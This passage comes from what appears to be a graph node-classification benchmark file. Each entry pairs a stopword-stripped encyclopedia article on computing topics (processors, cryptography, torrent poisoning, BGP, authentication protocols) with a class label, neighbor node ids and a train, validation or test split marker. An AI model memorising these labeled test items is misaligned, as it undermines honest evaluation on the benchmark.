design idt nec eventually toshiba powerpc 603q commissioned motorola target market apple computer low-cost accounts including home computer students home video console game named pippen 603q basically r4600 pipeline re-targeted powerpc instruction set since powerpc 603 power-efficient chip aim alliance name device chosen reflect low-cost low-power characteristics apple projects cancelled motorola stopped development 603q even though qed received first silicon samples functional rm52xx series first product line sold directly qed first series cost-reduced version r5000 smaller caches different pin-out earlier rm52x0 devices 16 kb caches later rm52x1 devices 32 kb caches rm523x devices 32-bit system buses rm526x 64-bit system buses product line successful laser printer market winning many accounts printer companies hewlett-packard lexmark ricoh samsung rm70xx series second product line sold directly qed implemented large 256 kb on-chip level 2 cache rm7000 one first microprocessors especially within embedded microprocessor market segment also implemented symmetric superscalar instruction issue two integer execution units rm7061 device pin-compatible upgrade rm526x series product line successful follow-on rm52xx products rm9x00 family first soc implemented qed apollo microprocessor core part rm9x00 pipeline lengthened 7 stages enable higher operating frequencies dynamic branch prediction added ameliorate longer branch latencies within rm9x00 two apollo cores used implement dual-core device processor cores successfully achieved operating frequency target 1 ghz soc system interconnect in-house design centralized storage transactions flowing soc peripherals included ddr memory controller sysad bus controller boot bus controller dma controller hypertransport controller second generation device added gigabit ethernet controller pci controller cache coherency product family successful due late market company financially conservative time leading company initial public offering would fully staff soc project one reasons selling company pmc-sierra fund soc projects time competitors like sibyte already entered market equivalent devices",
    "neighbors": [
      8711,
      5384,
      8976,
      2452,
      6815,
      8355,
      8231,
      426,
      7852,
      6834,
      7234,
      10051,
      6854,
      8523,
      6252,
      6253,
      10734,
      5235,
      8700,
      11007
    ],
    "mask": "Test"
  },
  {
    "node_id": 2072,
    "label": 2,
    "text": "Nokia_E60:nokia e60 nokia e60 traditional candybar style smartphone eseries business phone range s60 3rd edition symbian device introduced 12 october 2005 along nokia e61 nokia e70",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      7063,
      8472,
      5274,
      5019,
      5659,
      669,
      11545,
      10271,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      487,
      7399,
      6505,
      8423,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2073,
    "label": 3,
    "text": "Motorola_68010:motorola 68010 motorola mc68010 processor 16/32-bit microprocessor motorola released 1982 successor motorola 68000 fixes several small flaws 68000 adds features 68010 pin-compatible 68000 100 software compatible differences additionally 68010 loop mode accelerates loops consisting two instructions move dbra acts like tiny special-case instruction cache practice overall speed gain 68000 frequency less 10 68010 could used 68451 mmu however aspects design 1 clock memory access penalty made configuration unpopular vendors used mmu designs sun microsystems sun-2 workstation 68010 never popular 68000 however due 68010 small speed boost 68000 support virtual memory found number smaller unix systems 68451 mmu example torch triple x custom mmu sun-2 workstation unix pc ncr tower xp early hp 9000s like model 300 310 various research machines vendors stayed 68000 68020 introduced owners amiga atari st computers sega genesis game consoles replaced system 68000 cpu 68010 gain small speed boost",
    "neighbors": [
      7299,
      3844,
      4868,
      1158,
      7302,
      10501,
      1801,
      7305,
      3467,
      1548,
      6924,
      6415,
      5264,
      7065,
      7709,
      2334,
      8102,
      5297,
      11314,
      11447,
      8761,
      6075,
      6715,
      1983,
      6207,
      9665,
      10945,
      10051,
      10436,
      3017,
      4046,
      336,
      8530,
      3540,
      3932,
      5340,
      3936,
      6624,
      10851,
      9444,
      7269,
      6378,
      9964,
      1776,
      3185,
      8048,
      5235,
      5492,
      10224,
      3702,
      3319,
      7286,
      8058,
      8700,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 2074,
    "label": 4,
    "text": "Unicity_distance:unicity distance cryptography unicity distance length original ciphertext needed break cipher reducing number possible spurious keys zero brute force attack trying every possible key one decipherment makes sense i.e expected amount ciphertext needed determine key completely assuming underlying message redundancy claude shannon defined unicity distance 1949 paper communication theory secrecy systems consider attack ciphertext string wnaiw encrypted using vigenère cipher five letter key conceivably string could deciphered string—river water possibilities certain keys general rule cryptanalysis additional information impossible decode message course even case certain number five letter keys result english words trying possible keys get river water sxoos khdop well number working keys likely much smaller set possible keys problem knowing working keys right one rest spurious general given particular assumptions size key number possible messages average ciphertext length one key average generate readable message example see upper case english characters assume plaintext form 26 possible letters position string likewise assume five-character upper case keys k=26 possible keys majority work tremendous number possible messages n generated using even limited set characters n 26 l length message however smaller set readable plaintext due rules language perhaps likely much smaller n. moreover one-to-one relationship number keys work given k possible keys k × m/n work one correct key rest spurious since m/n gets arbitrarily small length l message increases eventually l large enough make number spurious keys equal zero roughly speaking l makes km/n=1 l unicity distance unicity distance equivalently defined minimum amount ciphertext required permit computationally unlimited adversary recover unique encryption key expected unicity distance shown u unicity distance h k entropy key space e.g 128 2 equiprobable keys rather less key memorized pass-phrase defined plaintext redundancy bits per character alphabet 32 characters carry 5 bits information per character 32 2 general number bits information per character n number characters alphabet binary logarithm english character convey bits information however average amount actual information carried per character meaningful english text 1.5 bits per character plain text redundancy 4.7 − 1.5 3.2 basically bigger unicity distance better one time pad unlimited size given unbounded entropy key space formula_2 consistent one-time pad unbreakable simple substitution cipher number possible keys number ways alphabet permuted assuming keys equally likely bits english text thus given 28 characters ciphertext theoretically possible work english plaintext hence key unicity distance useful theoretical measure n't say much security block cipher attacked adversary real-world limited resources consider block cipher unicity distance three ciphertext blocks although clearly enough information computationally unbounded adversary find right key simple exhaustive search may computationally infeasible practice unicity distance increased reducing plaintext redundancy one way deploy data compression techniques prior encryption example removing redundant vowels retaining readability good idea anyway reduces amount data encrypted ciphertexts greater unicity distance assumed one meaningful decryption ciphertexts shorter unicity distance may multiple plausible decryptions unicity distance measure much ciphertext required cryptanalysis much ciphertext required one reasonable solution cryptanalysis",
    "neighbors": [
      1315,
      7556,
      11241,
      1941,
      7542
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2075,
    "label": 4,
    "text": "Torrent_poisoning:torrent poisoning torrent poisoning intentionally sharing corrupt data data misleading file names using bittorrent protocol practice uploading fake torrents sometimes carried anti-infringement organisations attempt prevent peer-to-peer p2p sharing copyrighted content gather ip addresses downloaders decoy insertion content pollution method corrupted versions particular file inserted network deters users finding uncorrupted version also increases distribution corrupted file malicious user pollutes file converting another format indistinguishable uncorrupted files e.g may similar metadata order entice users download decoys malicious users may make corrupted file available via high bandwidth connections method consumes large amount computing resources since malicious server must respond large quantity requests result queries return principally corrupted copies blank file executable files infected virus.. known cases company created special version game published file sharing services advertising cracked undocumented hidden functionality making impossible win variant game method targets index found p2p file sharing systems index allows users locate ip addresses desired content thus method attack makes searching difficult network users attacker inserts large amount invalid information index prevent users finding correct resource invalid information could include random content identifiers fake ip addresses port numbers user attempts download corrupted content server fail establish connection due large volume invalid information users waste time trying establish connection bogus users thus increasing average time takes download file index poisoning attack requires less bandwidth server resources decoy insertion furthermore attacker transfer files respond requests reason index poisoning requires less effort methods attack companies disrupt p2p file sharing behalf content providers create software order launch attacks mediadefender written program directs users non-existent locations via bogus search results users typically select one top five search results method requires users persevere beyond initial failed attempts locate desired file idea many users simply give search frustration method attack prevents distributors serving users thus slows p2p file sharing attacker ’ servers constantly connect desired file floods provider ’ upstream bandwidth prevents users downloading file selective content poisoning also known proactive discriminatory content poisoning attempts detect copyright violators allowing legitimate users continue enjoy service provided open p2p network protocol identifies peer endpoint address file index format changed incorporate digital signature peer authentication protocol establish legitimacy peer downloads uploads files using identity based signatures system enables peer identify infringing users without need communication central authority protocol sends poisoned chunks detected users requesting copyright protected file legitimate users simply deny download requests known infringers latter usually accumulate clean chunks colluders paid peers share content others without authorization however method content poisoning forces illegitimate users discard even clean chunks prolonging download time voluntary collective licensing open music model theoretical systems users pay subscription fee access file-sharing network able legally download distribute copyright content selective content poisoning could potentially used limit access legitimate subscribed users providing poisoned content non-subscribed users attempt illegitimately use network eclipse attack also known routing-table poisoning instead poisoning network targets requesting peers directly attack attacker takes peer ’ routing table unable communicate peer except attacker attacker replicates whole network targeted peer manipulate number ways example attacker specify search results returned attacker also modify file comments peer ’ requests also directed back network attacker also modified also checks data randomly errors found attack attacker joins targeted swarm establishes connections many peers however attacker never provides chunks authentic otherwise peers common version attack chatty peer attack attacker establishes connection targeted peers via required handshake message followed message advertising number available chunks attacker never provide chunks also repeatedly resend handshake message attacks prevent downloads essentially peer wastes time dealing attacker instead downloading chunks others several reasons content providers copyright holders may choose torrent poisoning method guarding content first injecting decoys content providers normally monitor bittorrent network signs content illegally shared includes watching variations files files compressed formats process expensive time-consuming result poisoning continued first months following leak release second also unlikely torrent poisoning successful disrupting every illegal download instead aim content providers make illegal downloads statistically less likely clean complete hope users discouraged illegally downloading copyright material content providers copyright holders may decide financial outlay worth end result efforts methods attack described particularly effective measure effective countermeasures evolved measures must combined order significant impact illegal peer-to-peer filesharing using bittorrent protocols torrent files september 2004 altnet sued recording industry association america overpeer loudeye mediasentry others claiming spoofing services violated altnet patent file identification method called truenames 2005 finnish anti-infringement organisation viralg claimed software uses similar approach spoofing could used bring end illegal p2p file sharing firm offered total blocking peer 2 peer sharing intellectual property claimed patented virtual algorithm blocks illegal swapping data well claiming approach 99 effective despite claims algorithm yet tested bittorrent group finnish musicians requested investigation company arguing software effectively virus violation finnish law investigation declined finnish police later finnish parliamentary ombudsman jurisdictions concerns content providers copyright holders engaging poisoning activities may held liable damages users computers usa 2002 representative howard berman proposed peer peer piracy prevention act would granted immunity copyright holders taking steps prevent illegal distribution content i.e poisoning activities p2p networks long go far harm files stored p2p user computer however bill died later 2002 congressional term ended reintroduced 2005 reported hbo poisoning torrents show rome providing chunks garbage data users hbo also reported sent cease-and-desist letters internet service providers isps downloaders believe illegally downloaded episodes sopranos although targeted specifically bittorrent madonna american life album early example content poisoning release album tracks appeared similar length file size real album tracks leaked singer record label tracks featured clip madonna saying fuck think 're followed minutes silence similarly band barenaked ladies released number tracks online 2000 appeared legitimate copies tracks band latest album file contained short sample song followed clip band member saying although thought downloading new single actually downloading advertisement new album. ” unauthorized copy michael moore ’ movie sicko uploaded online became hit p2p websites pirate bay mediadefender hired poison torrents using decoy insertion example internet vigilantism anti-infringement vigilantes known create viruses distributed exclusively via p2p networks designed attack mp3s music files stored user pc nopir-b worm originated france poses dvd copying program deletes mp3 files user computer regardless whether legally obtained 19 october 2007 associated press ap released information accusing broadband service provider comcast hindering p2p file sharing traffic tests conducted ap shown comcast hindered uploading complete files bittorrent federal communications commission conducted public hearings response allegations comcast argued regulating network traffic enable reasonable downloading times majority users 21 august 2008 fcc issued order stated comcast network management unreasonable comcast must terminate use discriminatory network management end year comcast complied order appealed 6 june 2010 district court appeals columbia vacated fcc order comcast corp. v. fcc",
    "neighbors": [
      3969,
      8387,
      3428,
      3813,
      9351,
      9771,
      877,
      2864,
      1970,
      467,
      6454,
      4023,
      3320,
      10710,
      7515,
      10392
    ],
    "mask": "Test"
  },
  {
    "node_id": 2076,
    "label": 8,
    "text": "Feedly:feedly feedly stylized feedly news aggregator application various web browsers mobile devices running ios android also available cloud-based service compiles news feeds variety online sources user customize share others feedly first released devhd 2008 november 2006 edwin khodabakchian co-founded devhd company sought create platform uses rss feeds online storage social media integration connect users information find interesting devhd ’ first project streets aggregates updates variety online sources basis feedly feedly optimized rss feeds first released june 15 2008 originally called feeddo feedly first released web extension moving onto mobile platforms march 15 2013 feedly announced 500,000 new users 48 hours due closure announcement google reader april 2 2013 total number new users 3 million end may 2013 total user number 12 million feedly mobile application available ios iphone ipad android devices versions app run streets devhd project allows application run code devices running code across multiple platforms lets developers release updates faster working one version like web counterpart mobile application employs minimalistic interface imitates magazine spread however unlike browser extension feedly app load entire article instead present summary link actual article mobile application acts browser redirects happen inside app opposed opening separate internet browser additionally application adapts user recommend posts based user read shared past feedly app support offline mode third party apps offer service feedly received mostly positive reviews many praised minimalist design personalized interface however found service relies heavily minimalist approach others stated degree customization overwhelming first-time users following termination date google reader transitioning users began express frustration number seemingly basic features broken missing latest version feedly moreover 8 november 2013 feedly disabled login via oauth forcing users use google+ authentication change announced less 24 hours taking place result many users reliant social network unable export feeds change rolled back day far users choose either google+ oauth login june 11–13 2014 feedly suffered crippling denial-of-service attacks prevented users accessing information attackers demanded ransom feedly feedly refused pay",
    "neighbors": [
      1664,
      3971,
      9732,
      3462,
      8584,
      4490,
      6539,
      11274,
      10126,
      3350,
      11418,
      11674,
      1692,
      10270,
      1834,
      4013,
      5677,
      559,
      7983,
      9908,
      7488,
      10057,
      5205,
      4310,
      5078,
      6231,
      6237,
      6750,
      10722,
      3428,
      5605,
      2409,
      8169,
      9451,
      8557,
      9325,
      7921,
      119,
      11000,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 2077,
    "label": 6,
    "text": "Key_Sequenced_Data_Set:key sequenced data set key sequenced data set ksds type data set used ibm vsam computer data storage system record ksds data file embedded unique key ksds consists two parts data component separate index file known index component allows system physically locate record data file key value together data index components called cluster records accessed randomly sequence variable-length vsam data set ksds data index components consist control intervals organized control areas records added random ksds control intervals fill need split two new control intervals new control interval receiving roughly half records similarly control intervals control area used control area split two new control areas new control area receiving roughly half control intervals basic ksds one key primary key alternate indices may defined permit use additional fields secondary keys alternate index ksds",
    "neighbors": [
      1801,
      746,
      2127,
      2104,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 2078,
    "label": 2,
    "text": "Amstrad_CP/M_Plus_character_set:amstrad cp/m plus character set amstrad cp/m plus character set alternatively known pcw character set zx spectrum +3 character set refers group 8-bit character sets introduced amstrad/locomotive software use conjunction adaptation digital research cp/m plus various amstrad cpc schneider cpc amstrad pcw schneider joyce machines character set also utilized amstrad zx spectrum +3 since 1987 least zx spectrum +3 existed eight language-specific variants based iso/iec 646 depending selected locale system language 0 default us another slight variant character set used locoscript languages 1 7 certain characters range 0..127 swapped characters range 128..255 character set according following table",
    "neighbors": [
      5384,
      3563,
      11151,
      7504,
      3443,
      4409
    ],
    "mask": "Test"
  },
  {
    "node_id": 2079,
    "label": 5,
    "text": "Compound_TCP:compound tcp compound tcp ctcp microsoft algorithm introduced part windows vista window server 2008 tcp stack designed aggressively adjust sender congestion window optimise tcp connections large bandwidth-delay products trying harm fairness occur hstcp also available linux well windows xp windows server 2003 via hotfix like fast tcp tcp vegas compound tcp uses estimates queuing delay measure congestion queuing delay small assumes links path congested rapidly increases rate however unlike fast vegas seek maintain constant number packets queued compound tcp maintains two congestion windows regular aimd window delay-based window size actual sliding window used sum two windows aimd window increased way tcp reno increases delay small delay-based window increases rapidly improve utilisation network queuing experienced delay window gradually decreases compensate increase aimd window aim keep sum approximately constant algorithm estimates path bandwidth-delay product particular queuing detected delay-based window reduced estimated queue size avoid problem persistent congestion reported fast vegas thus unlike tcp-illinois precursor tcp africa compound tcp reduce window response delay increases fairness reno hotfix available adds ctcp support 64 bit windows xp windows server 2003 following registry key set 1 enable 0 disable ctcp enabled default computers running beta versions windows server 2008 disabled default computers running windows vista 7 ctcp enabled command disabled command display current setting ctcp use parameter add-on congestion control provider either value none ctcp disabled ctcp enabled since windows 8 windows uses powershell command set-nettcpsetting modify congestion control algorithm addition windows ctcp also ported linux angelo p. castellani patch derived developed caltech included ctcp tuning emulation tube patch available researchers due software patents since kernel version 2.6.17 module incompatible fails compile due kernel api changes",
    "neighbors": [
      8391,
      7017,
      9021,
      10124,
      941,
      10924,
      823,
      5817,
      6524,
      5181
    ],
    "mask": "None"
  },
  {
    "node_id": 2080,
    "label": 5,
    "text": "Challenge-Handshake_Authentication_Protocol:challenge-handshake authentication protocol computing challenge-handshake authentication protocol chap authenticates user network host authenticating entity entity may example internet service provider chap provides protection replay attacks peer use incrementally changing identifier variable challenge-value chap requires client server know plaintext secret although never sent network thus chap provides better security compared password authentication protocol pap vulnerable reasons ms-chap variant require either peer know plaintext transmit broken chap authentication scheme used point-to-point protocol ppp servers validate identity remote clients chap periodically verifies identity client using three-way handshake happens time establishing initial link lcp may happen time afterwards verification based shared secret client password id chosen random challenge also used corresponding response success failure packets new challenge new id must different last challenge another id success failure lost response sent triggers success failure indication md5 hash response value codice_1 md5 concatenation id secret challenge",
    "neighbors": [
      7,
      4490,
      4242,
      3477,
      2083,
      9635,
      2087,
      6834,
      4663,
      5433,
      6975,
      5568,
      10058,
      1618,
      6098,
      6750,
      2143,
      8670,
      2274,
      6888,
      8432,
      1012,
      8694,
      6649
    ],
    "mask": "None"
  },
  {
    "node_id": 2081,
    "label": 6,
    "text": "Bonnie++:bonnie++ bonnie++ free software file system benchmarking tool unix-like operating systems developed russell coker bonnie++ benchmark suite aimed performing number simple tests hard drive file system performance bonnie++ allows benchmark file systems perform respect data read write speed number seeks performed per second number file metadata operations performed per second ./bonnie++ -u root final csv output includes information related data read write speed number seeks performed per second number file metadata operations performed per second cpu usage statistics given tests benchmark named bonnie++ based bonnie benchmark written tim bray",
    "neighbors": [
      10658,
      4707,
      3462,
      1705,
      3882,
      10601,
      9964,
      823,
      3565,
      7983,
      4465,
      499,
      1461,
      2070,
      1911,
      5397,
      7836
    ],
    "mask": "Test"
  },
  {
    "node_id": 2082,
    "label": 4,
    "text": "Safe@Office:safe office safe office line firewall vpn appliances developed sofaware technologies check point company check point safe office product line targeted small medium business segment includes 500 500w wi-fi series internet security appliance old s-box safe home 100 series 200 series 400w series discontinued appliances licensed according number protected ip addresses referenced users numbers 5 25 unlimited also variant built-in adsl modem",
    "neighbors": [
      4568,
      8668,
      5749,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2083,
    "label": 2,
    "text": "Security_Support_Provider_Interface:security support provider interface security support provider interface sspi win32 api used microsoft windows systems perform variety security-related operations authentication sspi functions common interface several security support providers ssps security support provider dynamic-link library dll makes one security packages available applications following ssps installed windows sspi proprietary variant gssapi extensions windows-specific data types shipped windows nt 3.51 windows 95 nt lan manager security support provider ntlmssp windows 2000 implementation kerberos 5 added using token formats conforming official protocol standard rfc 1964 kerberos 5 gssapi mechanism providing wire-level interoperability kerberos 5 implementations vendors tokens generated accepted sspi mostly compatible gss-api sspi client windows may able authenticate gss-api server unix depending specific circumstances one significant shortcoming sspi lack makes gssapi interoperability impossible another fundamental difference ietf-defined gssapi microsoft sspi concept impersonation model server switch operate full privileges authenticated client operating system performs access control checks e.g opening new files whether less privileges privileges original service account depends entirely client connects/authenticates traditional gssapi model server runs service account elevate privileges perform access control client-specific application-specific fashion obvious negative security implications impersonation concept prevented windows vista restricting impersonation selected service accounts impersonation implemented unix/linux model using seteuid related system calls means unprivileged process elevate privileges also means take advantage impersonation process must run root another process cap_setuid capability",
    "neighbors": [
      513,
      2050,
      10243,
      517,
      7,
      9744,
      10769,
      9234,
      1043,
      1055,
      2080,
      8227,
      2087,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4663,
      7736,
      9281,
      3657,
      4174,
      10831,
      11345,
      4178,
      9813,
      603,
      8283,
      6750,
      2143,
      7264,
      2145,
      10341,
      5749,
      1656,
      2169,
      5754,
      3707,
      9340,
      641,
      5761,
      9348,
      1157,
      5765,
      2183,
      10886,
      4746,
      5259,
      8331,
      653,
      4242,
      1683,
      1688,
      3224,
      3742,
      4771,
      7846,
      8358,
      10414,
      2737,
      9394,
      9412,
      8391,
      5834,
      214,
      9943,
      9434,
      3805,
      2783,
      736,
      4321,
      2274,
      6370,
      4836,
      6888,
      1770,
      11498,
      3821,
      10991,
      2804,
      4863,
      9987,
      1288,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      10033,
      11569,
      11570,
      5433,
      7484,
      5952,
      1348,
      10058,
      844,
      8539,
      10079,
      11616,
      2943,
      10631,
      9609,
      9612,
      3477,
      9114,
      10654,
      8607,
      9635,
      11683,
      11693,
      10673,
      6584,
      2493,
      5568,
      8640,
      7629,
      6098,
      5590,
      474,
      8670,
      8161,
      6114,
      7139,
      8674,
      2027,
      9196,
      4590,
      11247,
      5107,
      1012,
      501,
      1526,
      3573,
      10229,
      510,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2084,
    "label": 4,
    "text": "Vulnerability_scanner:vulnerability scanner vulnerability scanner computer program designed assess computers networks applications known weaknesses plain words scanners used discover weaknesses given system utilized identification detection vulnerabilities arising mis-configurations flawed programming within network-based asset firewall router web server application server etc modern vulnerability scanners allow authenticated unauthenticated scans modern scanners typically available saas software service provided internet delivered web application modern vulnerability scanner often ability customize vulnerability reports well installed software open ports certificates host information queried part workflow cis critical security controls effective cyber defense designates continuous vulnerability scanning critical control effective cyber defense",
    "neighbors": [
      5636,
      10756,
      9356,
      3473,
      8978,
      4755,
      6548,
      1429,
      4373,
      10392,
      5373,
      3994,
      5246,
      4892,
      2717,
      413,
      2975,
      5404,
      6431,
      8094,
      2213,
      4517,
      807,
      8998,
      939,
      3629,
      9646,
      7855,
      1200,
      1970,
      7989,
      7352,
      5433,
      6586,
      3643,
      7739,
      9146,
      3262,
      9791,
      2430,
      11202,
      3525,
      7368,
      9160,
      9293,
      10190,
      1232,
      6993,
      467,
      9688,
      7515,
      4956,
      3172,
      3941,
      6373,
      7526,
      107,
      11244,
      6643,
      2678,
      7031,
      10232,
      2041,
      10492,
      5245,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 2085,
    "label": 5,
    "text": "Border_Gateway_Protocol:border gateway protocol border gateway protocol bgp standardized exterior gateway protocol designed exchange routing reachability information among autonomous systems internet protocol classified path vector protocol border gateway protocol makes routing decisions based paths network policies rule-sets configured network administrator involved making core routing decisions bgp may used routing within autonomous system application referred interior border gateway protocol internal bgp ibgp contrast internet application protocol may referred exterior border gateway protocol external bgp ebgp current version bgp version 4 bgp4 published rfc 4271 2006 progressing 20 drafts documents based rfc 1771 version 4 rfc 4271 corrected errors clarified ambiguities updated specification common industry practices major enhancement support classless inter-domain routing cidr use route aggregation decrease size routing tables bgp4 use internet since 1994 ipv6 bgp first defined rfc 1883 1995 improved rfc 2283 1998 new rfc allows bgp-4 carry wide range ipv4 ipv6 address families also called multiprotocol extensions multiprotocol bgp mp-bgp bgp neighbors called peers established manual configuration among routers create tcp session port 179 bgp speaker sends 19-byte keep-alive messages every 60 seconds maintain connection among routing protocols bgp unique using tcp transport protocol bgp runs two peers autonomous system referred internal bgp ibgp interior border gateway protocol runs different autonomous systems called external bgp ebgp exterior border gateway protocol routers boundary one exchanging information another called border edge routers simply ebgp peers typically connected directly ibgp peers interconnected intermediate routers deployment topologies also possible running ebgp peering inside vpn tunnel allowing two remote sites exchange routing information secure isolated manner main difference ibgp ebgp peering way routes received one peer propagated peers instance new routes learned ebgp peer typically redistributed ibgp peers well ebgp peers transit mode enabled router however new routes learned ibgp peering re-advertised ebgp peers route-propagation rules effectively require ibgp peers inside interconnected full mesh routes propagated controlled detail via route-maps mechanism mechanism consists set rules rule describes routes matching given criteria action taken action could drop route could modify attributes route inserting routing table peering handshake open messages exchanged bgp speakers negotiate optional capabilities session including multiprotocol extensions various recovery modes multiprotocol extensions bgp negotiated time creation bgp speaker prefix network layer reachability information nlri advertises address family prefix families include ipv4 default ipv6 ipv4/ipv6 virtual private networks multicast bgp increasingly bgp used generalized signaling protocol carry information routes may part global internet vpns order make decisions operations peers bgp peer uses simple finite state machine fsm consists six states idle connect active opensent openconfirm established peer-to-peer session bgp implementation maintains state variable tracks six states session bgp defines messages peer exchange order change session one state another first state idle state idle state bgp initializes resources refuses inbound bgp connection attempts initiates tcp connection peer second state connect connect state router waits tcp connection complete transitions opensent state successful unsuccessful starts connectretry timer transitions active state upon expiration active state router resets connectretry timer zero returns connect state opensent state router sends open message waits one return order transition openconfirm state keepalive messages exchanged upon successful receipt router placed established state established state router send/receive keepalive update notification messages to/from peer simplest arrangement routers within single participating bgp routing must configured full mesh router must configured peer every router causes scaling problems since number required connections grows quadratically number routers involved alleviate problem bgp implements two options route reflectors rfc 4456 bgp confederations rfc 5065 following discussion basic update processing assumes full ibgp mesh given bgp router may accept network layer reachability information nlri updates multiple neighbors advertise nlri different set neighbors conceptually bgp maintains master routing table called local routing information base loc-rib separate main routing table router neighbor bgp process maintains conceptual adjacent routing information base incoming adj-rib-in containing nlri received neighbor conceptual adj-rib-out outgoing nlri sent neighbor conceptual preceding paragraph means physical storage structure various tables decided implementer bgp code structure visible bgp routers although usually interrogated management commands local router quite common example store two adj-ribs loc-rib together data structure additional information attached rib entries additional information tells bgp process things whether individual entries belong adj-ribs specific neighbors whether peer-neighbor route selection process made received policies eligible loc-rib whether loc-rib entries eligible submitted local router routing table management process eligible submitted bgp submit routes considers best main routing table process depending implementation process bgp route necessarily selected example directly connected prefix learned router hardware usually preferred long directly connected route interface active bgp route destination put routing table interface goes preferred routes loc-rib route would installed main routing table recently common mistake say bgp carries policies bgp actually carried information rules inside bgp-speaking routers could make policy decisions information carried explicitly intended used policy decisions communities multi-exit discriminators med bgp standard specifies number decision factors ones used common routing process selecting nlri go loc-rib first decision point evaluating nlri next-hop attribute must reachable resolvable another way saying next-hop must reachable must active route already main routing table router prefix next-hop address reachable next neighbor bgp process applies various standard implementation-dependent criteria decide routes conceptually go adj-rib-in neighbor could send several possible routes destination first level preference neighbor level one route destination installed conceptual adj-rib-in process also delete adj-rib-in routes withdrawn neighbor whenever conceptual adj-rib-in changes main bgp process decides neighbor new routes preferred routes already loc-rib replaces given route withdrawn neighbor route destination route removed loc-rib longer sent bgp main routing table manager router route destination non-bgp source withdrawn route removed main routing table verifying next hop reachable route comes internal i.e ibgp peer first rule apply according standard examine local_preference attribute several ibgp routes neighbor one highest local_preference selected unless several routes local_preference latter case route selection process moves next tie breaker local_preference first rule standard reachability next_hop verified cisco several vendors first consider decision factor called weight local router i.e transmitted bgp route highest weight preferred local_preference weight criteria manipulated local configuration software capabilities manipulation outside scope standard commonly used example community attribute see directly used bgp selection process bgp neighbor process however rule set local_preference another factor based manually programmed rule set attribute community value matches pattern matching criterion route learned external peer per-neighbor bgp process computes local_preference value local policy rules compares local_preference routes neighbor per-neighbor level ignoring implementation-specific policy modifiers order tie breaking rules recent edition bgp standard update multi_exit_disc value several implementations created med highest possible value current standard however specifies missing meds treated lowest possible value since current rule may cause different behavior vendor interpretations bgp implementations used nonstandard default value configuration feature allows old standard rule selected candidate routes received neighbors loc-rib software applies additional tie-breakers routes destination one route still tied point several bgp implementations offer configurable option load-share among routes accepting number bgp communities attribute tags applied incoming outgoing prefixes achieve common goal rfc 1997 common say bgp allows administrator set policies prefixes handled isps generally possible strictly speaking instance bgp natively concept allow one tell another restrict advertisement prefix north american peering customers instead isp generally publishes list well-known proprietary communities description one essentially becomes agreement prefixes treated examples common communities include local preference adjustments geographic peer type restrictions dos avoidance black holing prepending options isp might state routes received customers community xxx:500 advertised peers default community xxx:501 restrict advertisement north america customer simply adjusts configuration include correct community communities route isp responsible controlling prefix advertised end user technical ability enforce correct actions taken isp though problems area generally rare accidental common tactic end customers use bgp communities usually asn:70,80,90,100 control local preference isp assigns advertised routes instead using med effect similar also noted community attribute transitive communities applied customer rarely become propagated outside next-hop isps give communities public bgp extended community attribute added 2006 order extend range attributes provide community attribute structuring means type field extended format consists one two octets type field followed seven six octets respective community attribute content definition extended community attribute documented rfc 4360 iana administers registry bgp extended communities types extended communities attribute transitive optional bgp attribute however bit type field within attribute decides whether encoded extended community transitive non-transitive nature iana registry therefore provides different number ranges attribute types due extended attribute range usage manifold rfc 4360 exemplarly defines two-octet specific extended community ipv4 address specific extended community opaque extended community route target community route origin community number bgp qos drafts also use extended community attribute structure inter-domain qos signalling note since rfc 7153 extended communities compatible 32 bits asns introduction 32 bits numbers issues immediately obvious community attribute defines 16 bits asn field prevents matching field real asn value reason rfc 8092 rfc 8195 introduce large community attribute 12 bytes divided three field 4 bytes function parameter meds defined main bgp standard originally intended show another neighbor advertising preference several links preferred inbound traffic another application meds advertise value typically based delay multiple presence ixp impose send traffic destination following bgp version 4 message header format autonomous system internal bgp ibgp must ibgp peers connect full mesh everyone speaks everyone directly full-mesh configuration requires router maintain session every router large networks number sessions may degrade performance routers due either lack memory high cpu process requirements route reflectors confederations reduce number ibgp peers router thus reduce processing overhead route reflectors pure performance-enhancing technique confederations also used implement fine-grained policy route reflectors reduce number connections required single router two redundancy made route reflector routers need configured peers confederations sets autonomous systems common practice one confederation numbers seen internet whole confederations used large networks large configured encompass smaller manageable internal ass confederations used conjunction route reflectors confederations route reflectors subject persistent oscillation unless specific design rules affecting bgp interior routing protocol followed however alternatives introduce problems including following additionally route reflectors bgp confederations designed ease bgp router configuration nevertheless common tools experienced bgp network architects tools may combined example hierarchy route reflectors routing tables managed bgp implementation adjusted continually reflect actual changes network links breaking restored routers going coming back network whole normal changes happen almost continuously particular router link changes supposed relatively infrequent router misconfigured mismanaged may get rapid cycle states pattern repeated withdrawal re-announcement known route flapping cause excessive activity routers know broken link route continually injected withdrawn routing tables bgp design delivery traffic may function routes updated internet bgp routing change may cause outages several minutes feature known route flap damping rfc 2439 built many bgp implementations attempt mitigate effects route flapping without damping excessive activity cause heavy processing load routers may turn delay updates routes affect overall routing stability damping route flapping exponentially decayed first instance route becomes unavailable quickly reappears damping take effect maintain normal fail-over times bgp second occurrence bgp shuns prefix certain length time subsequent occurrences timed exponentially abnormalities ceased suitable length time passed offending route prefixes reinstated slate wiped clean damping also mitigate denial service attacks damping timings highly customizable also suggested rfc 2439 design choices stability sensitive suppression route advertisement route flap damping feature desirable implemented exterior border gateway protocol sessions ebgp sessions simply called exterior peers interior border gateway protocol sessions ibgp sessions simply called internal peers approach route flaps inside autonomous system propagated external ass flapping route ebgp chain flapping particular route throughout 